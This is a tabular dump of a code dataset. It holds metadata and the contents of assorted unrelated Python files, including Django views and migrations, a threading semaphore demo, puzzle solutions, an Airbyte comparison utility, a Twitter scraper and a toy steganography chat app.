blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
09e0e639e78b5d589ce1b29c07d10a0f7a616734 | 45b64f620e474ac6d6b2c04fbad2730f67a62b8e | /Varsity-Final-Project-by-Django-master/.history/project/index/views_20210226000505.py | c8c780a29137164e7ee593f6beb0b9fcf9216d35 | [] | no_license | ashimmitra/Final-Project | 99de00b691960e25b1ad05c2c680015a439277e0 | a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003 | refs/heads/master | 2023-04-11T06:12:35.123255 | 2021-04-26T15:41:52 | 2021-04-26T15:41:52 | 361,796,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.shortcuts import render
from .model import AboutSite
def home(request):
    """Render the landing page with all AboutSite records in the context."""
    aboutdata = AboutSite.objects.all()
    # The original `context=[ 'about'= ]` was a syntax error; the evident
    # intent was a template context mapping the queryset under 'about'.
    context = {
        'about': aboutdata,
    }
    return render(request, "index.html", context)
def blog(request):
    """Render the static blog page."""
    return render(request,"blog.html")
| [
"34328617+ashimmitra@users.noreply.github.com"
] | 34328617+ashimmitra@users.noreply.github.com |
11b059a875363c44c367c680d055a178be4e0f45 | 448d028fb4b4703f0be32e0e6780a389c13b3914 | /semaphore_example.py | a95d141ccab4b526b728c7a8687c06b03c191811 | [] | no_license | katryo/python-threading | 9453dd377d7ab4aebbdb3bc9c222b4fe4d3cf156 | f65ebe725f86463f2e97d9426d233257c91518cd | refs/heads/master | 2020-04-21T22:48:41.737864 | 2019-02-09T23:33:53 | 2019-02-09T23:33:53 | 169,925,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from threading import Semaphore, Thread
from datetime import datetime
from time import sleep
class Runner:
    def run(self, sem):
        """Print the current time three times, holding `sem` around each print.

        With a Semaphore(2) shared by three threads, at most two threads can
        be inside the critical section (print + 1s sleep) at any moment.
        """
        attempts = 0
        while attempts < 3:
            sem.acquire()
            try:
                print(datetime.now())
                sleep(1)
            finally:
                sem.release()
            attempts += 1
if __name__ == '__main__':
    # Two permits shared by three workers: at most two prints per second.
    sem = Semaphore(2)
    runner = Runner()
    workers = [Thread(target=runner.run, args=(sem,)) for _ in range(3)]
    for worker in workers:
        worker.start()
| [
"katoryo55@gmail.com"
] | katoryo55@gmail.com |
b0766213ff36f4e3e57f2f14e1eac7fa6f65c9c3 | 13c14be20f16ffc14b7cde71ed8c4179e2410a0b | /algorithms/lisa-workbook.py | ac24edf42812ac4ec504b5bb62318e9c230d6018 | [] | no_license | gautamits/hackerrank | 79688e5735a27eed032ce0c34f4fe253cfb6b572 | aee6b00f4cd39c18e9107e933cceb55b9677c3c7 | refs/heads/master | 2020-05-21T22:55:50.977437 | 2018-12-11T05:09:36 | 2018-12-11T05:09:36 | 61,579,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from itertools import count, zip_longest
# Complete the workbook function below.
def workbook(n, k, arr):
    """Count "special" problems: those whose number equals the page they sit on.

    Each page holds at most k problems and every chapter starts on a fresh
    page; arr[i] is the number of problems in chapter i (n describes arr's
    length and is not otherwise needed).
    """
    special = 0
    page_no = 0
    for chapter_problems in arr:
        # Walk the chapter's pages; each page covers problems [first, last].
        for first in range(1, chapter_problems + 1, k):
            page_no += 1
            last = min(first + k - 1, chapter_problems)
            if first <= page_no <= last:
                special += 1
    return special
if __name__ == '__main__':
    # OUTPUT_PATH is supplied by the HackerRank judge environment.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    # First line: n (chapters) and k (max problems per page).
    nk = input().split()

    n = int(nk[0])

    k = int(nk[1])

    # Second line: problems per chapter.
    arr = list(map(int, input().rstrip().split()))

    result = workbook(n, k, arr)

    fptr.write(str(result) + '\n')

    fptr.close()
| [
"gautamamits95@gmail.com"
] | gautamamits95@gmail.com |
b89e6a9365194978cfa8663dd987ce19fe88410a | 72012dc3877b16b25f43cd62df1fc081c8f9299d | /my_site/views.py | 891f45eebcd96f9059c7081e4bfc31f47c753146 | [] | no_license | volitilov/wf_v2 | e12962bf1fbf3b6e73bd67bcccffc4e218575e5b | 1c2f585926f8258b208ad52f7ffa40576b4b37e2 | refs/heads/master | 2021-01-21T17:37:35.465356 | 2017-05-28T17:53:38 | 2017-05-28T17:53:38 | 91,968,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,151 | py | from django.template.context_processors import csrf
from django.shortcuts import redirect, render, get_object_or_404
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseRedirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import Mesage, PortfolioItem
from .forms import ContactsForm
# Home page ::::::::::::::::::::::::::::::::::::::::::::::
def home(request):
    """Render the landing page with the three most recent portfolio items."""
    context = {
        'works': PortfolioItem.objects.all()[:3],
    }
    return render(request, 'pages/index.html', context)
# About page :::::::::::::::::::::::::::::::::::::::::::::
def about(request):
    """Render the static "about" page."""
    return render(request, 'pages/about.html', {})
# Portfolio page :::::::::::::::::::::::::::::::::::::::::
def portfolio(request):
    """Render the portfolio page listing every work."""
    all_works = PortfolioItem.objects.all()
    return render(request, 'pages/portfolio.html', {'works': all_works})
# Info page ::::::::::::::::::::::::::::::::::::::::::::::
def info(request):
    """Render the static "info" page."""
    return render(request, 'pages/info.html', {})
# Services page ::::::::::::::::::::::::::::::::::::::::::
def services(request):
    """Render the static "services" page."""
    return render(request, 'pages/services.html', {})
# Contacts page ::::::::::::::::::::::::::::::::::::::::::
def contacts(request):
    """Render the contact form; on a valid POST save the message and
    show the feedback page."""
    args = {}
    args.update(csrf(request))
    args['form'] = ContactsForm
    if request.POST:
        form = ContactsForm(request.POST)
        if form.is_valid():
            form.save()
            # Removed a leftover `import pdb; pdb.set_trace()` that froze
            # every successful submission waiting on a debugger prompt.
            return render(request, 'pages/feedback.html',
                          {'name': form.cleaned_data['name']})
        # Re-display the bound form so field errors reach the template
        # (previously the unbound form class was shown, losing the errors).
        args['form'] = form
    return render(request, 'pages/contacts.html', args)
# Work page ::::::::::::::::::::::::::::::::::::::::::::::
def work(request, pk):
    """Render a single portfolio item (404 if absent) together with the
    full list of works for navigation."""
    # Dead commented-out pagination experiment removed; the view simply
    # resolves the requested item by primary key.
    works = PortfolioItem.objects.all()
    work = get_object_or_404(PortfolioItem, pk=pk)
    data = {
        'works': works,
        'work': work
    }
    return render(request, 'pages/work.html', data)
| [
"volitilov@gmail.com"
] | volitilov@gmail.com |
381fbd0dd22da0e55005395e2daaaf7acec16583 | a8b37bd399dd0bad27d3abd386ace85a6b70ef28 | /airbyte-integrations/bases/connector-acceptance-test/connector_acceptance_test/utils/compare.py | e71b1bafdc55d4db015a2835ce578c908a0db98f | [
"MIT",
"LicenseRef-scancode-free-unknown",
"Elastic-2.0"
] | permissive | thomas-vl/airbyte | 5da2ba9d189ba0b202feb952cadfb550c5050871 | 258a8eb683634a9f9b7821c9a92d1b70c5389a10 | refs/heads/master | 2023-09-01T17:49:23.761569 | 2023-08-25T13:13:11 | 2023-08-25T13:13:11 | 327,604,451 | 1 | 0 | MIT | 2021-01-07T12:24:20 | 2021-01-07T12:24:19 | null | UTF-8 | Python | false | false | 3,254 | py | #
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import functools
from typing import List, Mapping, Optional
import dpath.exceptions
import dpath.util
import icdiff
import py
from pprintpp import pformat
# Total terminal width available to the side-by-side diff output.
MAX_COLS = py.io.TerminalWriter().fullwidth
MARGIN_LEFT = 20
GUTTER = 3
# Horizontal space consumed by the left margin plus gutter around the diff.
MARGINS = MARGIN_LEFT + GUTTER + 1
def diff_dicts(left, right, use_markup) -> Optional[List[str]]:
    """Build a human-readable, side-by-side colorized diff of two values.

    `left`/`right` are pretty-printed and compared with icdiff; `use_markup`
    controls whether ANSI colors are emitted. Returns the diff as a list of
    lines headed by "equals failed".
    """
    # Pretty-print each side into half of the usable terminal width.
    half_cols = MAX_COLS / 2 - MARGINS
    pretty_left = pformat(left, indent=1, width=half_cols).splitlines()
    pretty_right = pformat(right, indent=1, width=half_cols).splitlines()
    diff_cols = MAX_COLS - MARGINS
    if len(pretty_left) < 3 or len(pretty_right) < 3:
        # avoid small diffs far apart by smooshing them up to the left
        smallest_left = pformat(left, indent=2, width=1).splitlines()
        smallest_right = pformat(right, indent=2, width=1).splitlines()
        max_side = max(len(line) + 1 for line in smallest_left + smallest_right)
        # Only shrink when both columns still fit in the terminal.
        if (max_side * 2 + MARGIN_LEFT) < MAX_COLS:
            diff_cols = max_side * 2 + GUTTER
            pretty_left = pformat(left, indent=2, width=max_side).splitlines()
            pretty_right = pformat(right, indent=2, width=max_side).splitlines()
    differ = icdiff.ConsoleDiff(cols=diff_cols, tabsize=2)
    if not use_markup:
        # colorization is disabled in Pytest - either due to the terminal not
        # supporting it or the user disabling it. We should obey, but there is
        # no option in icdiff to disable it, so we replace its colorization
        # function with a no-op
        differ.colorize = lambda string: string
        color_off = ""
    else:
        color_off = icdiff.color_codes["none"]
    icdiff_lines = list(differ.make_table(pretty_left, pretty_right, context=True))
    # Prefix each diff line with a color reset so rows render independently.
    return ["equals failed"] + [color_off + line for line in icdiff_lines]
@functools.total_ordering
class HashMixin:
    """Mixin giving containers a deterministic, order-insensitive hash and a
    total ordering derived from that hash (via functools.total_ordering)."""
    @staticmethod
    def get_hash(obj):
        # Recursively reduce nested mappings/lists to a stable hash: dict
        # items are sorted by key and list element hashes are sorted, so
        # logically-equal structures hash equally regardless of order.
        # NOTE(review): relies on the str() form of the intermediate dict
        # being stable across runs -- do not change these expressions.
        if isinstance(obj, Mapping):
            return hash(str({k: (HashMixin.get_hash(v)) for k, v in sorted(obj.items())}))
        if isinstance(obj, List):
            return hash(str(sorted([HashMixin.get_hash(v) for v in obj])))
        return hash(obj)

    def __hash__(self):
        return HashMixin.get_hash(self)

    def __lt__(self, other):
        # Ordering is by hash value only -- stable, but otherwise arbitrary.
        return hash(self) < hash(other)

    def __eq__(self, other):
        # Equality by hash admits false positives on hash collisions --
        # presumably acceptable for test-data comparison; confirm if reused.
        return hash(self) == hash(other)
class DictWithHashMixin(HashMixin, dict):
    """dict that is hashable and orderable via HashMixin."""
    pass
class ListWithHashMixin(HashMixin, list):
    """list that is hashable and orderable via HashMixin."""
    pass
def delete_fields(obj: Mapping, path_list: List[str]) -> None:
    """Remove every dpath path in `path_list` from `obj` in place.

    Paths that do not exist are silently ignored (best-effort deletion).
    """
    for field_path in path_list:
        try:
            dpath.util.delete(obj, field_path)
        except dpath.exceptions.PathNotFound:
            # Absent path: nothing to remove.
            pass
def make_hashable(obj, exclude_fields: List[str] = None) -> str:
    """Wrap nested dicts/lists in hashable variants to simplify comparison.

    :param obj: value to prepare for comparison
    :param exclude_fields: dpath paths removed from a mapping before wrapping
    """
    if not isinstance(obj, (Mapping, List)):
        # Scalars are already hashable/comparable as-is.
        return obj
    if isinstance(obj, List):
        return ListWithHashMixin(obj)
    # Mapping: drop ignored fields first so they never influence the hash.
    if exclude_fields:
        delete_fields(obj, exclude_fields)
    return DictWithHashMixin(obj)
| [
"noreply@github.com"
] | thomas-vl.noreply@github.com |
6b910e42492be063380898c263fff9db242597d7 | bf2aa4eab14a6a5347fe4af65cc4a37f512a465d | /people/migrations/0185_auto_20211228_1012.py | f7d8a97b37ffb72adfa1415ed169341a3c45484d | [] | no_license | drdavidknott/betterstart | 0cda889f5cd6bb779f6d1fa75cb4f2ef08eb626c | 59e2f8282b34b7c75e1e19e1cfa276b787118adf | refs/heads/master | 2023-05-04T07:32:24.796488 | 2023-04-16T15:26:30 | 2023-04-16T15:26:30 | 173,626,906 | 0 | 0 | null | 2023-02-18T07:27:55 | 2019-03-03T20:37:01 | Python | UTF-8 | Python | false | false | 2,187 | py | # Generated by Django 3.1.13 on 2021-12-28 10:12
from django.db import migrations, models
import django.db.models.deletion
import people.django_extensions
# Auto-generated Django migration: adds Survey_Submission/Survey_Answer and
# tweaks survey_question ordering. Do not edit operations by hand.
class Migration(migrations.Migration):

    dependencies = [
        ('people', '0184_survey_question_survey_question_type'),
    ]

    operations = [
        # Re-order survey questions by survey, section, then question number.
        migrations.AlterModelOptions(
            name='survey_question',
            options={'ordering': ['survey_section__survey__name', 'survey_section__name', 'number'], 'verbose_name_plural': 'survey questions'},
        ),
        # One submission = one person answering one survey on one date.
        migrations.CreateModel(
            name='Survey_Submission',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField(blank=True, null=True)),
                ('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.person')),
                ('survey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey')),
            ],
            options={
                'verbose_name_plural': 'survey submissions',
                'ordering': ['-date'],
            },
            bases=(people.django_extensions.DataAccessMixin, models.Model),
        ),
        # One answer per question within a submission (numeric range or text).
        migrations.CreateModel(
            name='Survey_Answer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('range_answer', models.IntegerField(default=0)),
                ('text_answer', models.CharField(blank=True, default='', max_length=500)),
                ('survey_question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey_question')),
                ('survey_submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='people.survey_submission')),
            ],
            options={
                'verbose_name_plural': 'survey answers',
                'ordering': ['-survey_submission__date', '-survey_question__number'],
            },
            bases=(people.django_extensions.DataAccessMixin, models.Model),
        ),
    ]
| [
"dkoysta@gmail.com"
] | dkoysta@gmail.com |
8f0d1c6f1c3a8f8d9e42acba2344603fcafe173d | dc3d310934705034ab2f5bc4d3a96f07dab9b48b | /about_orm/app01/models.py | eb0e65d0120790442bd0561e2021c0df7c9e6ab5 | [] | no_license | createnewdemo/istudy_test | 82197488d9e9fa05e0c6cc91362645fc4555dc1d | 806693f2bee13e3c28571d0d75f6b6ea70acf7a0 | refs/heads/master | 2022-04-19T05:52:53.780973 | 2020-04-17T17:04:10 | 2020-04-17T17:04:10 | 256,507,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | from django.db import models
# Create your models here.
class Person(models.Model):
    """Demo model showing column renaming, auto timestamps and Meta options."""
    pid = models.AutoField(primary_key=True)
    # Stored in the database under the column name 'nick'.
    name = models.CharField(db_column='nick',max_length=32,blank=True,null=True) #char
    age = models.IntegerField()
    birth = models.DateTimeField(auto_now=True)# refreshed automatically on every save
    #auto_now_add=True: set the current time only when the row is created
    #auto_now=True: set the current time on both create and edit
    class Meta:
        # Table name in the database (default would be appname_classname).
        db_table = "Person"
        # Singular name shown in the admin.
        verbose_name = '个人信息'
        # Plural name shown in the admin (instead of verbose_name + "s").
        verbose_name_plural = '所有用户信息'
        # # composite index
        # index_together = [
        #     ("name", "age"), # must be two existing fields
        # ]
        #
        # # composite unique constraint
        # unique_together = (("name", "age"),) # must be two existing fields
    def __str__(self):
        return "{}-{}".format(self.name,self.age)
class Publisher(models.Model):
    """A publishing house; referenced by Book via a foreign key."""
    name = models.CharField(max_length=32,verbose_name='出版社名称')
    def __str__(self):
        return "<Publisher object:{}-{}>".format(self.pk,self.name)
class Book(models.Model):
    """A book belonging to one Publisher and many Authors."""
    name = models.CharField(max_length=32,verbose_name='书名')
    # publisher.books / filter(book__...) via the related names below.
    pub = models.ForeignKey(Publisher,on_delete=models.CASCADE,related_name='books',related_query_name='book')
    price = models.DecimalField(max_digits=5,decimal_places=2) #999.99 max (5 digits, 2 decimal)
    sale = models.IntegerField()
    repertory = models.IntegerField()# stock on hand
    def __str__(self):
        return "<Book object:{}-{}>".format(self.pk,self.name)
class Author(models.Model):
    """An author; many-to-many with Book (reverse accessor: book.authors)."""
    name = models.CharField(max_length=32,verbose_name='姓名')
    books = models.ManyToManyField('Book',related_name='authors')
    def __str__(self):
        return "<Author object:{}-{}>".format(self.pk,self.name)
| [
"320783214@qq.com"
] | 320783214@qq.com |
8f96c48c1e4bd9530d879ca2c31181ad9a56ae83 | 6e9f3e81af3ab66b10f8602544695ad9b035ffa5 | /jcoin/scripts/make-account.py | b95b671a8d4502546c79277eb6056937b88e1bef | [
"MIT"
] | permissive | slice/jose | 5ca7074e326e5fcffe7a1abfef249160644faa7c | 13e39b958f58fd024b3ba5b7ccd0a1cd7f02f14c | refs/heads/master | 2021-05-04T22:48:09.804518 | 2018-03-06T02:18:47 | 2018-03-06T02:18:47 | 99,070,186 | 0 | 0 | null | 2017-08-02T03:55:23 | 2017-08-02T03:55:23 | null | UTF-8 | Python | false | false | 198 | py | import requests
def main():
    """POST a wallet-account creation request (type 0) to the local API."""
    payload = {'type': 0}
    response = requests.post(
        'http://0.0.0.0:8080/api/wallets/162819866682851329',
        json=payload,
    )
    print(response)


if __name__ == '__main__':
    main()
| [
"lkmnds@gmail.com"
] | lkmnds@gmail.com |
4df461452801f2faf135f7c05f95ba61cea06067 | 9c6decc65c5dc7aed3aff66405cdafa3a750d8a5 | /Problem001-100/001 Multiples of 3 and 5.py | 7bd80a9209855897b4d5ae1373916f32144db95b | [] | no_license | Anfany/Project-Euler-by-Python3 | 9374a6a112843f03f7cda6b689a8fd7db7914a9d | 385e2c1c02b5e81111e054c3807911defde2dc29 | refs/heads/master | 2021-04-06T00:48:03.603738 | 2019-04-18T02:35:02 | 2019-04-18T02:35:02 | 124,505,893 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | #!/usr/bin/python3.5
# -*- coding: UTF-8 -*-
#Author: AnFany
# Problem001 Multiples of 3 and 5
# Project Euler 1: sum the natural numbers below 1000 divisible by 3 or 5.
an = sum(i for i in range(1, 1000) if i % 3 == 0 or i % 5 == 0)
print(an)
# Answer: 233168
| [
"noreply@github.com"
] | Anfany.noreply@github.com |
7355cb8b618bc1bf927c25c2ad8f74d161bec0bb | 6bf19501437a419bfb0b891a1ac55b52ab833b97 | /apps/master/actors/chat.py | c391adc38b6c2b7c8daffee794dcb38e1e27239d | [
"Apache-2.0"
] | permissive | jdelrue/digital_me | 330351edbfa5ffb931f5f0592c5738432c2eaa88 | 5e4699a3c94088fa089e0c1fefab9955cd6bd927 | refs/heads/master | 2020-04-07T16:56:53.703863 | 2018-07-31T13:08:30 | 2018-07-31T13:08:30 | 158,549,943 | 0 | 0 | NOASSERTION | 2018-11-21T13:11:28 | 2018-11-21T13:11:28 | null | UTF-8 | Python | false | false | 1,075 | py | from jumpscale import j
#BE CAREFUL MASTER IS IN: /code/github/threefoldtech/jumpscale_lib/JumpscaleLib/servers/gedis/base/actors/chat.py
JSBASE = j.application.jsbase_get_class()
class chat(JSBASE):
    """
    Gedis actor exposing the chatbot work queue to remote clients.
    """
    def __init__(self):
        JSBASE.__init__(self)
        # Shared chatbot instance of the currently running gedis server.
        self.chatbot = j.servers.gedis.latest.chatbot
        #check self.chatbot.chatflows for the existing chatflows
    #all required commands are here
    # NOTE(review): the triple-quoted ```in / ```out blocks below appear to be
    # parsed by the gedis server as argument/result schemas -- confirm before
    # editing them; they are deliberately left untouched here.
    def work_get(self, sessionid,schema_out):
        """
        ```in
        sessionid = "" (S)
        ```
        ```out
        cat = "" (S)
        msg = "" (S)
        ```
        """
        # Fetch the next pending work item (category + message) for this session.
        cat,msg = self.chatbot.session_work_get(sessionid)
        return {"cat":cat,"msg":msg}
    def work_report(self, sessionid, result):
        """
        ```in
        sessionid = "" (S)
        result = "" (S)
        ```
        ```out
        ```
        """
        # Hand the client's answer back to the waiting chat session.
        self.chatbot.session_work_set(sessionid,result)
    def session_alive(self,sessionid,schema_out):
        # Not implemented yet: should report whether the session is still active.
        #TODO:*1 check if greenlet is alive
        pass
| [
"kristof@incubaid.com"
] | kristof@incubaid.com |
51242aad84f877f6312483b22294f379050c32d6 | c8a7ccfb42628d1100562a053c4334488e1bf239 | /shell_cartesian_product.py | 6fa93aafa24d0d97ef46b832a619ec80dfc50343 | [
"CC0-1.0"
] | permissive | LyricLy/python-snippets | 8487619a916e33e02b5772aba577d9dafdfd803b | 9d868b7bbccd793ea1dc513f51290963584a1dee | refs/heads/master | 2020-04-08T01:57:22.511167 | 2018-11-24T08:12:20 | 2018-11-24T08:12:20 | 158,916,096 | 1 | 0 | CC0-1.0 | 2018-11-24T08:16:59 | 2018-11-24T08:16:59 | null | UTF-8 | Python | false | false | 624 | py | #!/usr/bin/env python3
# encoding: utf-8
import re as _re
def expand(str) -> (str, str):
    """expand a string containing one non-nested cartesian product strings into two strings

    >>> expand('foo{bar,baz}')
    ('foobar', 'foobaz')
    >>> expand('{old,new}')
    ('old', 'new')
    >>> expand('uninteresting')
    'uninteresting'
    """
    # Find the first {left,right} group that contains no nested braces.
    match = _re.search(r'{([^{}]*),([^{}]*)}', str)
    if match is None:
        # No product syntax: hand the input back unchanged.
        return str
    prefix = str[:match.start()]
    suffix = str[match.end():]
    return (prefix + match.group(1) + suffix,
            prefix + match.group(2) + suffix)
def _test():
    """Run the module's doctests (the examples in expand's docstring)."""
    import doctest
    doctest.testmod()

if __name__ == '__main__':
    _test()
| [
"bmintz@protonmail.com"
] | bmintz@protonmail.com |
c7efb64ec9be875434887caa7539ac4f76f26d5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02398/s216293399.py | f27ba33161028edb6af38fe51bdbad406e51b2e2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from sys import stdin
# Read A B C from one line and count the divisors of C inside [A, B].
a, b, c = map(int, stdin.readline().split())
divisor_count = 0
for candidate in range(a, b + 1):
    if c % candidate == 0:
        divisor_count += 1
print(divisor_count)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5bed01a254bd62b699ed700ae1d181c947b9b35a | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/B/buttub/basic_twitter_scraper_210.py | 9d1bd12d5fb4a5b4529a86e87666c11c1e6b964c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | ###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7d254cf76a88c8dfee2d600c08809f29ae21763e | d7e131777d76b98d76cc3a37f96313282b1ad69c | /functions.py | 856222fe9fdc0a66c0ab04d04595eca664c857c5 | [] | no_license | prashararchi/spy-chat | bd7e71bbcb627c075e196f1c487d8039ac843db4 | 9d2cb9a81f78ac7afc08642d6669988d3ee67500 | refs/heads/master | 2020-12-02T22:10:09.834229 | 2017-07-03T10:04:17 | 2017-07-03T10:04:17 | 96,092,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | from spy_details import*
from steganography.steganography import Steganography
from colorama import init,Fore,Style
from datetime import datetime
#reading chat_history
def read_chat_history():
read_for = select_friend()
for chat in friends[read_for].chats:
if chat.sent_by_me:
init(autoreset=True)
msg_chat=Fore.BLUE+chat.time.strftime("%d %b %y")
print '[%s] %s: %s' %(msg_chat ,'You said:' ,chat.message)
else:
print '[%s] %s said: %s' % (msg_chat, friends[read_for].name, chat.message)
#starting chat
def start_chat(user):
    # Main menu loop: dispatch on the user's numeric choice until they exit.
    # NOTE(review): `user` is never used inside the loop -- confirm whether it
    # was meant to personalise the session.
    result = True
    while result:
        choice = menu_choices()
        # checking the choices.
        if (choice == 1):
            add_status()
        elif(choice == 2):
            add_friend()
        elif(choice == 3):
            send_message()
        elif(choice == 4):
            read_message()
        elif(choice == 5):
            read_chat_history()
        elif(choice == 6):
            # Exit: falsify the loop condition instead of returning directly.
            result = False
        else:
            print ("Wrong choice.Sorry you are not of the correct age to be a spy")
#introducing menu_choice
def menu_choices():
    """Show the main menu and return the user's numeric choice."""
    options = (
        "Add a status",
        "Add a friend",
        "Send a secret message",
        "Receive/Read secret message",
        "Read chat History",
        "Exit Application.",
    )
    for number, label in enumerate(options, 1):
        print("%d. %s" % (number, label))
    choice = int(raw_input("Enter your choice: "))
    return choice
#adding status
def add_status():
    # Let the user type a new status or pick one of the presets.
    all_status = ['available', 'sleeping', 'at work']
    choice = int(raw_input("press 1 to add new status or press other key to add other status"))
    if choice == 1:
        current_status = raw_input("enter new status")
        all_status.append(current_status)
    else:
        # Show the presets numbered from 1 and read a 1-based selection.
        count = 1
        for temp in all_status:
            print("%d %s" % (count, temp))
            count += 1
        choose = int(raw_input("which status you want?"))
        current_status = all_status[choose - 1]
    # NOTE(review): all_status and current_status are locals, so the chosen
    # status is discarded when this function returns -- it is never stored on
    # the spy or in spy_details. Confirm where it should be persisted.
#adding friend
def add_friend():
    # Collect details for a new Spy and append it to the shared friends list.
    new_friend = Spy('','',0,0.0)
    new_friend.name = raw_input("enter friends name")
    new_friend.salutation = raw_input("enter mr or ms")
    new_friend.age =int(raw_input("enter age"))
    new_friend.rating = float(raw_input("enter rating"))
    # Only accept friends with a non-empty name who are older than 12.
    if len(new_friend.name) > 0 and new_friend.age > 12 :
        friends.append(new_friend)
    else:
        print 'Invalid entry. We cant add spy with the details you provided'
    # Returns the current friend count (unchanged when the entry was invalid).
    return len(friends)
#selecting friend
def select_friend():
    """List all friends and return the 0-based index of the chosen one."""
    item = 0
    for friend in friends:
        print (friend.name, friend.age,friend.rating)
        item = item + 1
    #selecting friends.
    friend_choice = int(raw_input("choose: "))
    # Convert the 1-based menu choice to a 0-based list index. The original
    # computed this (`frnd`) but returned the raw choice, so every caller
    # indexed `friends` one position off (or crashed on the last friend).
    frnd = int(friend_choice) - 1
    return frnd
#sending message
def send_message():
    """Hide a message inside an image and record it in the friend's chat log."""
    friend_choice = select_friend()
    original_image = 'nature.jpg'
    output_path = 'output.jpg'
    # NOTE(review): the secret message is hard-coded; presumably it should be
    # read from the user -- confirm intended behaviour.
    text = 'YOO I DID IT.FINALLY I AM FEELING GOOD'
    Steganography.encode(original_image, output_path, text)
    new_chat = chat_message(text, True)
    friends[friend_choice].chats.append(new_chat)
    print ("Your secret message is ready")
    # Removed the unconditional `send_message()` self-call: it re-ran the
    # whole flow forever with no exit path until the stack overflowed.
#reading message
def read_message():
sender = select_friend()
output_path =("output.jpg")
get = Steganography.decode(output_path)
print get
new_chat = chat_message( get,False)
friends[sender].chats.append(new_chat)
print("your message has been sent")
read_message()
| [
"="
] | = |
